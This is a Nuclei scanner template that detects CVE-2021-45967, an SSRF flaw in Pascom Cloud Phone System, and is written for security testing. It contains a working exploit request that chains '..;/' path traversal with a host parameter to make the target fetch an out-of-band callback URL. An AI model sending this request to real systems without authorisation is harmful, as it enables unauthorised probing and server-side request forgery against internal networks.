id: CVE-2021-45967

info:
  name: Pascom CPS SSRF
  author: dwisiswant0
  severity: high
  description: |
    Pascom version packaged with Cloud Phone System (CPS) versions before 7.20 contains a known SSRF issue
  reference:
    - https://kerbit.io/research/read/blog/4
  tags: cve,cve2021,pascom,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS)

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: status
        status:
          - 200